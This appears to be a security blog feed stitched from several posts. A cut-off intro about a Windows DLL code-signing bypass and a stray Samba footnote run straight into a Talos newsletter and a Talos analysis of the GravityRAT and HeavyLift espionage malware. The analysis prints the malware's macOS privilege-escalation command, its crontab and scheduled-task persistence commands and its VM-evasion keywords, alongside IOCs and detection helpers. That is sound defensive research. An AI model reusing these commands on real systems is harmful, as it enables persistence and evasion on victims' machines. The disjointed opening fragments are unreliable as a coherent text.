We set out to increase our understanding of Windows internals by adapting research into DLL loading into impersonating services using WinSxS, but we got sidetracked into examining the code signing method used for DLL files and we found a way to bypass it. While we were unable to apply it in the scenario we started out with, we did find other places where we could use it to elevate privileges, bypass WDAC and inject code into protected processes. Just like our previous research “Bad things come in large packages: .pkg signature verification bypass on macOS” about a signature bypass for macOS .pkg files, we see here that vulnerabilities in cryptographic operations can often be applied in a multitude of ways, allowing different security measures to be bypassed. Just like that example, this vulnerability could go from a user opening a downloaded file to full system compromise.


  1. There appears to be a disagreement between Samba and Windows about what an SMB2_FILE_FULL_EA_INFO GetInfo request means. Windows issues it to query the value for a specific EA, while Samba responds with all EAs on a file, which confuses Windows. Instead of trying to patch Samba to fix this, we resolved it by making sure the $KERNEL.PURGE.ESBCACHE EA is the only EA set on the file.

How we can separate botnets from the malware operations that rely on them

13 June 2024 at 18:00

As I covered in last week’s newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting the likes of some of the largest threat actors and malware families.  

Operation Endgame, which Europol touted as the “largest ever operation against botnets,” targeted malware droppers including the IcedID banking trojan, Trickbot ransomware, the Smokeloader malware loader, and more.  

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we’ve written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but usually are not a complete shutdown of their operations, forcing them to go offline forever.  

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors’ abilities to carry out these actions, but it’s not necessarily the end of the final payload these actors usually use, such as ransomware.  

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as a separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT’s botnet, though McKay said “we’re not sure yet” if this has had any tangible effects on their operations.

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate [because] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

The one big thing 

This week, Cisco Talos disclosed a new malware campaign called “Operation Celestial Force” that has been running since at least 2018. It is still active today, using GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.” Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.

Why do I care? 

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware. There are two ways that this attacker commonly targets users to be on the lookout for: One is spearphishing emails that look like they’re referencing legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.  

So now what? 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense in depth models to protect against such attacks across various attack surfaces. 

Top security headlines of the week 

Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature. The Recall tool in Windows 11 takes continuous screenshots of users’ activity, which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it’ll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall’s announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET)

A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen “a significant volume of data” from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers’ Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers’ computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired)

Recovery from a cyber attack affecting several large hospitals in London could take several months, according to an official with the U.K.’s National Health Service. The affected hospitals and general practitioners’ offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. “It is unclear how long it will take for the services to get back to normal, but it is likely to take many months,” the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients’ blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5 
MD5: d3ee270a07df8e87246305187d471f68 
Typical Filename: iptray.exe 
Claimed Product: Cisco AMP 
Detection Name: Generic.XMRIGMiner.A.A13F9FCC

SHA 256: 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e 
MD5: ecbfdbb42cb98a597ef81abea193ac8f 
Typical Filename: N/A 
Claimed Product: MAPIToolkitConsole.exe 
Detection Name: Gen:Variant.Barys.460270 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

13 June 2024 at 10:00

By Gi7w0rm, Asheer Malhotra and Vitor Ventura. 

  • Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”  
  • All GravityRAT and HeavyLift infections are administered by a standalone tool we are calling “GravityAdmin,” which carries out malicious activities on an infected device. Analysis of the panel binaries reveals that they are meant to administer and run multiple campaigns at the same time, all of which are codenamed and have their own admin panels.  
  • Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  This multiyear operation continuously targeted Indian entities and individuals likely belonging to defense, government and related technology spaces. Talos initially disclosed the use of the Windows-based GravityRAT malware by suspected Pakistani threat actors in 2018 — also used to target Indian entities.  
  • While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware

Operation Celestial Force: A multi-campaign, multi-component infections operation 

Talos assesses with high confidence that this series of campaigns we’re clustering under the umbrella of “Operation Celestial Force” is conducted by a nexus of Pakistani threat actors. The tactics, techniques, tooling and victimology of Cosmic Leopard contain some overlaps with those of Transparent Tribe, another suspected Pakistani APT group, which has a history of targeting high-value individuals from the Indian subcontinent. However, we do not have enough technical evidence to link both the threat actors together for now, therefore we track this cluster of activity under the “Cosmic Leopard” tag. 

Operation Celestial Force has been active since at least 2018 and continues to operate today, increasingly utilizing an expanding and evolving malware suite, indicating that the operation has likely seen a high degree of success targeting users in the Indian subcontinent. Cosmic Leopard initially began the operation with the creation and deployment of the Windows-based GravityRAT malware family distributed via malicious documents (maldocs). Cosmic Leopard then created Android-based versions of GravityRAT around 2019 to widen their net of infections and begin targeting mobile devices. During the same year, Cosmic Leopard also expanded their arsenal to use the HeavyLift malware family as a malware loader. HeavyLift is primarily wrapped in malicious installers sent to targets, who are tricked into running the malware via social engineering techniques.

Some campaigns from this multi-year operation have been disclosed and loosely attributed to Pakistani threat actors in previous reporting. However, there has been little evidence to tie all of them together until now. Each campaign in the operation has been codenamed by the threat actor and managed/administered using custom-built panel binaries we call “GravityAdmin.” 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Initiating contact and infecting targets 

This campaign primarily utilizes two infection vectors — spear phishing and social engineering. Spear phishing consists of messages sent to targets with pertinent language and maldocs that contain malware such as GravityRAT. 

The other infection vector, which is gaining popularity in this operation and is now a staple tactic of Cosmic Leopard’s operations, consists of contacting targets over social media channels, establishing trust with them and eventually sending them a malicious link to download either the Windows- or Android-based GravityRAT or the Windows-based loader, HeavyLift.

 Malicious drop site delivering HeavyLift. 

Operation Celestial Force’s malware and its management interfaces 

Talos’ analysis reveals the use of multiple components, including Android- and Windows-based malware, and administrative binaries supporting multiple campaign panels used by Operation Celestial Force. 

  • GravityRAT: GravityRAT, a closed-source malware family, first disclosed by Talos in 2018, is a Windows- and Android-based RAT used to target Indian entities.  
  • HeavyLift: A previously unknown Electron-based malware loader family distributed via malicious installers targeting the Windows operating system.  
  • GravityAdmin: A tool to administer infected systems (panel binary), used by operators since at least 2021, by connecting to GravityRAT’s and HeavyLift’s C2 servers. GravityAdmin consists of multiple inbuilt User Interfaces (UIs) that correspond to specific, codenamed, campaigns being operated by malicious operators.   

Operation Celestial Force’s infection chains are:  

[Figure: Operation Celestial Force infection chains.]

GravityAdmin: Panel binaries administering the campaigns 

The Panel binaries we analyzed consist of multiple versions with the earliest compiled in August 2021. The panel binary asks for a user ID, password and campaign ID (from a drop-down menu) from the operator when it runs.  

 Login screen for GravityAdmin titled “Bits Before Bullets.”

When the operator clicks the login button, the executable will check if it is connected to the internet by sending a ping request to www[.]google[.]com. Then, the user ID and password are authenticated with an authentication server which sends back: 

  • A code to direct the panel binary to open the panel UI for the specified panel. 
  • A value sent back via the HTTP “Authorization” header. This value acts as an authentication token when communicating with campaign-specific C2 servers to load data such as a list of infected machines.

A typical Panel screen will list the machines infected as part of the specific campaign. It also has buttons to trigger various malicious actions against one or more infected systems.  


Different panels have different capabilities; however, some core capabilities are common across all campaigns.

The various campaigns configured in the Panel binaries are code named as: 

  • "SIERRA" 
  • "QUEBEC" 
  • "ZULU" 
  • "DROPPER" 
  • "WORDDROPPER" 
  • "COMICUM" 
  • "ROCKAMORE" 
  • "FOXTROT" 
  • "CLOUDINFINITY" 
  • "RECOVERBIN" 
  • "CVSCOUT" 
  • "WEBBUCKET" 
  • "CRAFTWITHME" 
  • "SEXYBER" 
  • "CHATICO" 

Each of the codenamed campaigns from the Panel binaries consists of its own infection mechanisms. For example, “FOXTROT,” “CLOUDINFINITY” and “CHATICO” are names given to all Android-based GravityRAT infections whereas “CRAFTWITHME,” “SEXYBER” and “CVSCOUT” are named for attacks deploying HeavyLift. Our analysis correlates the campaigns listed above with the Operating Systems being targeted with respective malware families. 

Campaign Name | Platform targeted and Malware Used
SIERRA | Windows, GravityRAT
QUEBEC | Windows, GravityRAT
ZULU | Windows, GravityRAT
DROPPER / WORDDROPPER / COMICUM | Windows, GravityRAT
ROCKAMORE | Windows, GravityRAT
FOXTROT / CLOUDINFINITY / RECOVERBIN / CHATICO | Android, GravityRAT
CVSCOUT | Windows, HeavyLift
WEBBUCKET / CRAFTWITHME | Windows, HeavyLift
SEXYBER | Windows, HeavyLift
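For triage, the campaign-to-malware mapping above can be kept as a small lookup table. The following is a minimal sketch, not part of Talos' tooling; the function name `describe_campaign` is hypothetical, and the data is copied from the table above.

```python
# Campaign codename -> (targeted platform, malware family), as listed in the table above.
CAMPAIGNS = {
    "SIERRA": ("Windows", "GravityRAT"),
    "QUEBEC": ("Windows", "GravityRAT"),
    "ZULU": ("Windows", "GravityRAT"),
    "DROPPER": ("Windows", "GravityRAT"),
    "WORDDROPPER": ("Windows", "GravityRAT"),
    "COMICUM": ("Windows", "GravityRAT"),
    "ROCKAMORE": ("Windows", "GravityRAT"),
    "FOXTROT": ("Android", "GravityRAT"),
    "CLOUDINFINITY": ("Android", "GravityRAT"),
    "RECOVERBIN": ("Android", "GravityRAT"),
    "CHATICO": ("Android", "GravityRAT"),
    "CVSCOUT": ("Windows", "HeavyLift"),
    "WEBBUCKET": ("Windows", "HeavyLift"),
    "CRAFTWITHME": ("Windows", "HeavyLift"),
    "SEXYBER": ("Windows", "HeavyLift"),
}


def describe_campaign(codename):
    """Return (platform, malware) for a codename, or None if it is not listed."""
    return CAMPAIGNS.get(codename.strip().upper())
```

A codename seen in a URL path or panel string can then be resolved with a call such as `describe_campaign("foxtrot")`.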

Most campaigns share infrastructure with one another, mostly to host malicious payloads or maintain a list of infected systems.

Malicious domain | Campaigns using the domain
mozillasecurity[.]com | SIERRA, QUEBEC, DROPPER
officelibraries[.]com | SIERRA, DROPPER, ZULU

GravityRAT: A multi-platform remote access trojan

GravityRAT is a Windows-based remote access trojan first disclosed by Talos in 2018. GravityRAT was later ported to the Android operating system to target mobile devices around 2019. Since 2019, we’ve observed the continuous addition of a multitude of capabilities to GravityRAT and its associated infrastructure. So far, we have observed the use of GravityRAT exclusively by suspected Pakistani threat actors to target entities and individuals in India. There is currently no publicly available evidence that GravityRAT is commodity or open-source malware, which would suggest its potential use by multiple, disparate threat actors.

Our analysis of the entire ecosystem of Operation Celestial Force revealed that GravityRAT’s use in this campaign likely began as early as 2016 and continues to this day. 

The latest variants of GravityRAT are distributed through malicious websites, some registered and set up as late as early January 2024, pretending to distribute legitimate Android applications. Malicious operators will distribute the download links to their targets over social media channels asking them to download and install the malware. 

The latest variants of GravityRAT use the previously mentioned code names to define the campaigns. The screenshot below shows the initial registration of a victim into the C2, getting back a list of alternative C2 to be used, if needed.  

 The group uses Cloudflare service to hide the true location of their C2 servers.

After registration, the trojan requests tasks to execute from the C2, then uploads a file containing the device's location.

The trojan will use a different user-agent for each request — it's unclear if this is done on purpose, or if this anomaly is just the result of cut-and-paste code from other projects to tie together this trojan’s features.  

GravityRAT requests the following permissions on the device for stealing information and housekeeping tasks. 

[Figure: Android permissions requested by GravityRAT.]

These variants of GravityRAT are similar to previously disclosed versions from ESET and Cyble and consist of the following capabilities: 

  1. Send preliminary information about the device to the C2. This information includes IMEI, phone number, network country ISO code, network operator name, SIM country ISO code, SIM operator name, SIM serial number, device model, brand, product and manufacturer, addresses surrounding the obtained longitude and latitude of the device and the current build information, including release, host, etc. 
  2. Read SMS data and content and upload to the C2. 
  3. Read specific file formats and upload them to the C2. 
  4. Read call logs and upload them to the C2. 
  5. Obtain IMEI information including associated email ID and send it to C2. 
  6. Delete all contacts, call logs and files related to the malware. 

HeavyLift: Electron-based malware loader

Some of the campaigns in this operation use Electron-based malware loaders we’re calling “HeavyLift,” which consist of JavaScript code communicating with and controlled by C2 servers. These are the same C2 servers that interact with GravityAdmin, the panel tool used by the operators to govern infected systems. HeavyLift is essentially a stage one malware component that downloads and installs other malicious implants whenever available on the C2 server. HeavyLift bears some similarities with GravityRAT’s Electron versions disclosed previously by Kaspersky in 2020.

A HeavyLift infection begins with an executable masquerading as an installer for a legitimate application. The installer installs a dummy application but also installs and sets up a malicious Electron-based desktop application. This malicious application is, in fact, HeavyLift and consists of JavaScript code that carries out malicious operations on the infected system. 

On execution, HeavyLift will check if it is running on a macOS or Windows system. If it is running on macOS, and not running as root, it will execute with admin privileges using the command: 

 /usr/bin/osascript -e 'do shell script "bash -c " _process_path " with administrator privileges'  

If it is running as root, it will set the default HTTP User-Agent to “M_9C9353252222ABD88B123CE5A78B70F6”, then get system info using the commands: 

system_profiler SPHardwareDataType | grep 'Model Name' 

system_profiler SPHardwareDataType | grep 'SMC' 

system_profiler SPHardwareDataType | grep 'Model Identifier' 

system_profiler SPHardwareDataType | grep 'ROM' 

system_profiler SPHardwareDataType | grep 'Serial Number'  

For a Windows-based system, the HTTP User-Agent is set to “W_9C9353252222ABD88B123CE5A78B70F6”. The malware will then obtain preliminary system information such as: 

  • Processor ID 
  • MAC address 
  • Installed anti-virus product name 
  • Username 
  • Domain name 
  • Platform information 
  • Process, OS architecture 
  • Agent (hardcoded value) 
  • OS release number 

All this preliminary information is sent to the hardcoded C2 server URL to register the infection with the C2. 
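The two hardcoded User-Agent values described above lend themselves to a simple log check. The sketch below is illustrative only: the record layout (a dictionary with a `user_agent` key) and the function names are assumptions, and real proxy logs will need their own parsing.

```python
# Hardcoded HeavyLift User-Agent values reported above, mapped to the platform they indicate.
HEAVYLIFT_USER_AGENTS = {
    "M_9C9353252222ABD88B123CE5A78B70F6": "macOS",
    "W_9C9353252222ABD88B123CE5A78B70F6": "Windows",
}


def classify_user_agent(user_agent):
    """Return the platform implied by a HeavyLift User-Agent, or None if it does not match."""
    return HEAVYLIFT_USER_AGENTS.get(user_agent.strip())


def flag_records(records):
    """Yield (record, platform) for log records whose 'user_agent' field matches.

    'records' is assumed to be an iterable of dicts with a 'user_agent' key;
    that layout is hypothetical and not taken from any specific product.
    """
    for record in records:
        platform = classify_user_agent(record.get("user_agent", ""))
        if platform is not None:
            yield record, platform
```

An exact-match comparison is used on purpose, since the source reports these values as complete User-Agent strings rather than substrings.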

HeavyLift will then reach out to the C2 server to poll for any new payloads to execute on the infected system. A payload received from the C2 will be dropped to a directory in the “AppData” directory and persisted on the system. 

On macOS, the payload is a ZIP file that is extracted, and the resulting binary persists using crontab via the command: 

crontab -l 2>/dev/null; echo ' */2 * * * * "_filepath_" _arguments_ ' | crontab - 
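The crontab entry above runs the payload every two minutes, which suggests a simple hunting check on macOS hosts. The following is a rough sketch that scans crontab text (for example, the output of `crontab -l`) for entries on that exact schedule; the function name is hypothetical, and legitimate jobs can use the same schedule, so hits are leads rather than verdicts.

```python
def find_two_minute_jobs(crontab_text):
    """Return the command portion of every crontab entry scheduled as '*/2 * * * *'."""
    hits = []
    for raw_line in crontab_text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue  # environment assignments and malformed lines
        if fields[:5] == ["*/2", "*", "*", "*", "*"]:
            hits.append(fields[5])
    return hits
```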

For Windows, the payload received is an EXE file that persists on the system via a scheduled task. The malware will create an XML file for the scheduled task with the payload path, arguments and working directory and then use the XML to set up the scheduled task: 

SCHTASKS /Create /XML "_xmlpath_" /TN "_taskname_" /F 

The malware will then open the accompanying HTML file via web view to appear legitimate. 

 In some cases, the malware will also perform anti-analysis checks to see if it’s running in a virtual environment.  

It checks for the presence of specific keywords and closes if there is a match: 

  • Innotek GmbH 
  • VirtualBox 
  • VMware 
  • Microsoft Corporation 
  • HITACHI

These keywords are checked against model information, SMC, ROM and serial numbers on macOS, and against manufacturer information, such as product, vendor, processor and more, on Windows. 
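Analysts who detonate samples in a sandbox may want to know whether their environment exposes any of the strings listed above, since a match causes the malware to exit. The sketch below checks a list of hardware strings collected by the analyst against those keywords. Case-insensitive substring matching is an assumption here; the source does not say how the malware compares them.

```python
# Keywords the malware looks for, as listed above.
VM_KEYWORDS = ("Innotek GmbH", "VirtualBox", "VMware", "Microsoft Corporation", "HITACHI")


def exposed_vm_keywords(hardware_strings, keywords=VM_KEYWORDS):
    """Return the keywords that appear in any of the given hardware strings.

    Matching is a case-insensitive substring test (an assumption, see lead-in).
    """
    found = []
    for keyword in keywords:
        needle = keyword.lower()
        if any(needle in value.lower() for value in hardware_strings):
            found.append(keyword)
    return found
```

An empty result means none of the listed keywords were found in the supplied strings; it does not rule out other anti-analysis checks.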

Coverage 

Ways our customers can detect and block this threat are listed below.  


 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

 Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

 Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

IOCs 

IOCs for this research can also be found at our GitHub repository here

HeavyLift 

8e9bcc00fc32ddc612bdc0f1465fc79b40fc9e2df1003d452885e7e10feab1ee
ceb7b757b89693373ffa1c46dd96544bdc25d1a47608c2ea24578294bcf1db37 
06b617aa8c38f916de8553ff6f572dcaa96e5c8941063c55b6c424289038c3a1 
da3907cf75662c3401581a5140831f8b2520a4c3645257b3860c7db94295af88 
838fd5d269fa09ef4f7e9f586b6577a9f46123a0af551de02de78501d916236d 
12d98137cd1b0cf59ce2fafbfe3a9c3477a42dae840909adad5d4d9f05dd8ede 
688c8e4522061bb9d82e4c3584f7ef8afc6f9e07e2374567755faad2a22e25b8 
5695c1e5e4b381844a36d8281126eef73a9641a315f3fdd2eb475c9073c5f4da 
8d458fb59b6da20e1ba1658bb4a1f7dbb46d894530878e91b64d3c675d3d4516

 

GravityRAT Android 

36851d1da9b2f35da92d70d4c88ea1675f1059d68fafd3abb1099e075512b45e 
4ebdfa738ef74945f6165e337050889dfa0aad61115b738672bbeda648a59dab 
1382997d3a5bb9bdbb9d41bb84c916784591c7cdae68305c3177f327d8a63b71 
c00cedd6579e01187cd256736b8a506c168c6770776475e8327631df2181fae2 
380df073825aca1e2fdbea379431c2f4571a8c7d9369e207a31d2479fbc7be88

  

GravityAdmin 

63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf 
69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9 
04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f
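The file hashes above can be matched against files on disk. Below is a minimal sketch using the three GravityAdmin SHA-256 values listed above; the function names are hypothetical, and the same approach applies to the HeavyLift and GravityRAT lists.

```python
import hashlib

# GravityAdmin SHA-256 values copied from the list above.
GRAVITYADMIN_SHA256 = {
    "63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf",
    "69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9",
    "04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f",
}


def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large files are not loaded into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_known_hash(path, known_hashes=GRAVITYADMIN_SHA256):
    """Return True if the file's SHA-256 is in the supplied set of lowercase hex digests."""
    return sha256_of_file(path) in known_hashes
```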

 

Network IOCs 

 androidmetricsasia[.]com 
dl01[.]mozillasecurity[.]com 
officelibraries[.]com 
javacdnlib[.]com 
windowsupdatecloud[.]com 
webbucket[.]co[.]uk 
craftwithme[.]uk 
sexyber[.]net 
rockamore[.]co[.]uk 
androidsdkstream[.]com 
playstoreapi[.]net 
sdklibraries[.]com 
cvscout[.]uk 
zclouddrive[.]com 
jdklibraries[.]com 
cloudieapp[.]net 
androidadbserver[.]com 
androidwebkit[.]com 
teraspace[.]co[.]in

  

hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]cloudieapp[.]net/cloudie[.]zip 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]dev[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]adb[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]library[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]ux[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]cloudinfinity-d4049-default-rtdb[.]firebaseio[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/Sier/resauth[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]tl37[.]officelibraries[.]com/Sier/resauth[.]php 
hxxps[://]tl37[.]officelibraries[.]com/resauth[.]php/ 
hxxps[://]jun[.]javacdnlib[.]com/Quebec/5be977ac[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]dl01[.]mozillasecurity[.]com/MicrosoftUpdates/6efbb147[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MicrosoftUpdates/741bbfe6[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MsWordUpdates/c47d1870[.]php 
hxxps[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxp[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxps[://]download[.]rockamore[.]co[.]uk/m2c/m_client[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/ 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/61c10953[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/RB/e7a18a38[.]php 
hxxps[://]sdk2[.]sdklibraries[.]com/golf/c6cf642b[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php 
hxxps://hxxp[://]api1[.]androidsdkstream[.]com/foxtrot//DataX/ 
hxxps[://]download[.]cvscout[.]uk/cvscout/cvstyler_client[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/strong_client[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/strong_client[.]php 
hxxps[://]download[.]sexyber[.]net/sexyber/sexyberC[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/A0B74607[.]php 
hxxps[://]zclouddrive[.]com/system/546F9A[.]php 
hxxps[://]download[.]cvscout[.]uk/cvscout/ 
hxxps[://]download[.]cvscout[.]uk/c9a5e83c[.]php 
hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]zclouddrive[.]com/system/clouddrive/ 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]download[.]sexyber[.]net/0fb1e3a0[.]php 
